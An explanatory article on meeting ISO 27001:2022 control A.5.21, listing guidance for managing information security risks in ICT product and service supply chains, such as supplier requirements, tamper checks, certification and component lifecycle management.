This article provides additional information on how you can meet the requirement for the ISO 27001: 2022 A.5.21 Managing information security in the ICT supply chain.
ISO 27001: 2022 Control Description
Processes and procedures shall be defined and implemented to manage the information security risks associated with the ICT products and services supply chain.
Purpose
To maintain an agreed level of information security in supplier relationships.
Guidance on implementation
The following topics should be considered to address information security within the ICT supply chain, in addition to the general information security requirements for supplier relationships:
a) Defining information security requirements for the acquisition of ICT products or services;
b) Requiring ICT services suppliers to propagate the organisation’s security requirements throughout the supply chain if they subcontract parts of the ICT service provided to the organisation;
c) Requiring ICT product suppliers to propagate appropriate security practices throughout the supply chain if these products include components purchased or acquired from other suppliers or entities (e.g. subcontracted software developers and hardware component providers);
d) Requesting that ICT product suppliers provide information describing the software components used in their products;
e) Requesting that ICT product suppliers provide information describing the implemented security functions of their products and the configuration required for secure operation;
f) Implementing a monitoring process and acceptable methods for validating that delivered ICT products and services comply with stated security requirements. Examples of such supplier review methods can include penetration testing and proof or validation of third-party attestations for the supplier’s information security operations;
g) Implementing a process for identifying and documenting product or service components that are critical for maintaining functionality and therefore require increased attention, scrutiny, and further follow-up when built outside the organisation, especially if the supplier outsources aspects of product or service components to other suppliers;
h) Obtaining assurance that critical components and their origin can be traced throughout the supply chain;
i) Obtaining assurance that the delivered ICT products function as expected, without any unexpected or unwanted features;
j) Implementing processes to ensure that components from suppliers are genuine and unaltered from their specification. Example measures include anti-tamper labels, cryptographic hash verifications, or digital signatures. Monitoring for out-of-specification performance can be an indicator of tampering or counterfeits. Prevention and detection of tampering should be implemented at multiple stages in the system development life cycle, including design, development, integration, operations, and maintenance;
k) Obtaining assurance that ICT products achieve required security levels, for example, through formal certification or an evaluation scheme such as the Common Criteria Recognition Arrangement;
l) Defining rules for sharing information regarding the supply chain and any potential issues and compromises among the organisation and suppliers;
m) Implementing specific processes for managing ICT component life cycle and availability, along with associated security risks. This includes managing the risks of components no longer being available due to suppliers going out of business or suppliers no longer providing these components due to technological advancements. Identification of an alternative supplier and the process to transfer software and competence to the alternative supplier should be considered.
The specific ICT supply chain risk management practices are built on top of general information security, quality, project management, and system engineering practices but do not replace them.
Other Information
Organisations are advised to work with suppliers to understand the ICT supply chain and any issues that may significantly impact the products and services being provided. The organisation can influence ICT supply chain information security practices by making clear in agreements with their suppliers the matters that should be addressed by other suppliers in the ICT supply chain.
ICT should be acquired from reputable sources. The reliability of software and hardware is a matter of quality control. While it is generally not possible for an organisation to inspect the quality control systems of its vendors, it can make reliable judgments based on the reputation of the vendor.
The ICT supply chain as addressed here includes cloud services.
Examples of ICT supply chains include:
a) Cloud services provisioning, where the cloud service provider relies on software developers, telecommunication service providers, and hardware providers;
b) IoT, where the service involves the device manufacturers, the cloud service providers (e.g. the IoT platform operators), the developers of mobile and web applications, and the vendors of software libraries;
c) Hosting services, where the provider relies on external service desks, including first, second, and third support levels.